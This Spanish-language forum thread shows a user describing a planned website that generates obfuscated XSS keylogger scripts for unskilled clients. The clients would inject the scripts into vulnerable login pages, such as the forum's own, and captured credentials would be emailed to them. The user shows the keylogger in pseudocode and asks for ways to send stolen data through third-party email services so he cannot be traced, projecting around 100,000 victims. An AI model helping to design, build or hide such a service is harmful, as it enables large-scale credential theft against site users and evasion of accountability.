Es casi lo mismo, solo que con un paso extra, tienes que registrar una cuenta...
1. Yo me registro con tu servidor
2. Me das el script que voy a usar para enviar correos
3. Uso el script para enviar corrreos a quien quiera.
Otra cosa es que el formato quizás no sea lo ideal... pero como quiera, SPAM es SPAM.
1. Requiere que yo proporcione un servidor en el cual te registres o a traves del cual te registres. Me convierto en responsable de ofrecer un servicio ilegal o facilitarlo siendo un elemento necesario de cada infeción.
Como usas el script para enviar a correos a quien quieras?
Creo que no me explique bien.
Caso hipotético.
Tú MinusFour encuentras un xss en este foro en el propio loggin que te permite escribir un codigo javascript con el que puedes inyectar código al sitio. Lo que quieres es un keylogger que se ejecute por parte de todos los usuarios que accedan al foro, así cuando alguien escriba su usuario y contraseña se te envie por correo. Esto implica que tendrás que escribir código.
Mi sitio lo que ofrece es escribir ese código por ti, y que mediante el uso de pocos prompts tengas todo el código listo sin necesidad de que tú tengas que escribir una sola línea de código. Copiar y pegar.
Entonces entras a example.com/Keylogger y ya te salta el prompt:
Introduce el correo al que enviar los datos recabados por el Keylogger:
micorreo@example.comScript Generado:
《script》
...
...
...
Ofuscar(Keylogger(){obtenerTeclasPulsadasEnLaPestaña();EnviarACorreo(TeclasPulsadas,
micorreo@example.com);}
var DetectadoIntentoEnvioDeCredenciales = false;
while (PestañaActiva) {
if (DetectadoIntentoEnvioDeCredenciales) {Keylogger();}}
...
...
...
)《/script》
Ahora solo tienes que ir al formulario del foro, darle a pegar y enviar. El script es inyectado en la página.
Ahora yo StringManolo accedo al apartado del loggin del foro y escribo:
String Manolo micontraseñaesesta
El keylogger captura las credenciales y las envia al correo automáticamente.
Ahora otro usuario accede y se loggea y lo mismo.
Si uso mi servidor o mi hosting para mandar el correo, cuando ElBrujo vea el fuente con el script inyectado verá que los datos que pilla el keylogger son enviados a mi servidor o hosting desde el script. Y eso es lo que no quiero, ya que yo no he sido quien a infectado al sitio.
Para yo no ser localizado tendría que montar una infraestructura, ser muy cuidadoso, mantenerlo activamente para que no sea vulnerado, tenerlo online 24/7 para que el servicio esté activo, etc.
Mucho dolor de cabeza cuando yo lo único que hago es generar un script.
Otra opción es generar el PHP también y que el usuario lo ponga en su server. Pero claro, mi página va dirigida a clientes del sitio que no tengan conocimientos, ya que vienen redirigidos de un scanner que busca XSS y una guía con dorks para hacerlo a mano. Entonces complicaría el proceso para el cliente y aún por encima requiere que el cliente tenga su propio servidor.
Por eso la alternativa que se me ocurre es usar una lista de servicios de terceros que me permitan mandar los datos que obtiene el keylogger mediante correo. Así reduciría toda la complejidad de meter servidores míos o del cliente de por medio y la infección se podría hacer de modo seguro.
Obviamente no todos los sitios se pueden infectar de forma tan fácil. Pero de forma resumida sin entrar en más detalles ese es el problema que quiero solventar y no consigo como hacerlo.
Otro problema es la burrada de tráfico que se puede generar...
Si 100 personas generan un script. Cada persona infecta 10 sitios de media, y cada sitio tiene 100 usuarios de media que introducen credenciales y otras cosas...
Serian 1000 sitios infectados con 100000 usuarios en total que ponen sus credenciales u otras cosas. Y algunos con uso continuado. Lo que podrían generar el envio de millones de correos en relativamente poco tiempo. Lo cual no creo que me lo permita ningún servicio de terceros.
Alguna idea de como o alternativas, workarounds? Es un buen lío para resolverlo xD